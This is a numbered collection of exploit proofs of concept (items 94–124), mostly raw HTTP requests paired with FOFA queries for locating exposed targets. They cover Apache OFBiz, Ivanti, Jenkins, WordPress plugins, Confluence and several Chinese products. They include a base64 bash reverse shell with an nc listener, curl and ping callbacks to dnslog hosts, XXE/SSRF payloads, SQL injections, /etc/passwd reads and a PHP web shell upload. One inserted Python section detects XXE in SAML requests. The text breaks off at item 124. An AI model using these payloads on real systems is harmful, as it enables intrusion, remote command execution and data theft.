Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777


POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the XML file contents; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


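Because the XXE payload above travels base64-encoded inside the SAMLRequest field, a WAF rule or log-review script only sees it after decoding. The following helper is an added defensive example, not code from the original post: it decodes a SAMLRequest value (plain base64 for the POST binding used by saml-sso.cgi, deflate plus base64 for the Redirect binding) and flags DOCTYPE and external-entity declarations, which a legitimate AuthnRequest never carries. The sample requests and the collector.example host are constructed.

```python
import base64
import re
import zlib

# Indicators a legitimate SAML AuthnRequest never carries: a document type
# declaration, and in particular an entity that resolves an external
# SYSTEM/PUBLIC identifier (the out-of-band XXE pattern in the PoC above).
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
_EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def decode_saml_request(value: str, deflated: bool = False) -> bytes:
    """Recover the XML behind a SAMLRequest value.

    The HTTP-POST binding (the saml-sso.cgi case) sends plain base64; the
    HTTP-Redirect binding deflates first, so pass deflated=True for values
    taken from a query string. Padding is restored because some clients
    strip it before sending.
    """
    raw = base64.b64decode(value + "=" * (-len(value) % 4))
    if deflated:
        raw = zlib.decompress(raw, -15)  # raw DEFLATE stream, no zlib header
    return raw


def inspect_saml_request(value: str, deflated: bool = False) -> dict:
    """Decode one SAMLRequest value and report which XXE indicators it shows."""
    xml = decode_saml_request(value, deflated)
    return {
        "has_doctype": _DOCTYPE_RE.search(xml) is not None,
        "external_entity": _EXTERNAL_ENTITY_RE.search(xml) is not None,
        "xml": xml.decode("utf-8", errors="replace"),
    }


def is_suspicious(value: str, deflated: bool = False) -> bool:
    """True when the request should be blocked or alerted on."""
    report = inspect_saml_request(value, deflated)
    return report["has_doctype"] or report["external_entity"]


def encode_saml_request(xml: bytes, deflated: bool = False) -> str:
    """Inverse of decode_saml_request; used here only to build sample values."""
    if deflated:
        comp = zlib.compressobj(9, zlib.DEFLATED, -15)
        xml = comp.compress(xml) + comp.flush()
    return base64.b64encode(xml).decode("ascii")


# Constructed samples (not taken from the page): a normal AuthnRequest and a
# request whose prolog declares a parameter entity pointing at an external host.
BENIGN_XML = (
    b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    b'ID="_c0ffee" Version="2.0" IssueInstant="2024-01-01T00:00:00Z"/>'
)
XXE_XML = (
    b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % ext SYSTEM '
    b'"http://collector.example/x"> %ext;]><r></r>'
)
BENIGN_REQUEST = encode_saml_request(BENIGN_XML)
XXE_REQUEST = encode_saml_request(XXE_XML)
# Redirect-binding form, with the base64 padding stripped as clients often do.
XXE_REQUEST_REDIRECT = encode_saml_request(XXE_XML, deflated=True).rstrip("=")


if __name__ == "__main__":
    for name, value, deflated in (
        ("benign-post", BENIGN_REQUEST, False),
        ("xxe-post", XXE_REQUEST, False),
        ("xxe-redirect", XXE_REQUEST_REDIRECT, True),
    ):
        print(f"{name}: suspicious={is_suspicious(value, deflated)}")
```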
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "topicurl":"getSysStatusCfg",
  "token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php.

119. Beijing Baichuo (北京百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default username/password is admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo (北京百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php
121. Beijing Baichuo (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


File path: boot/web/upload/weblogo/1.php

122. Byzoro Smart S200 management platform (北京百绰智能) /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The value sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded (encoding, not encryption); decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
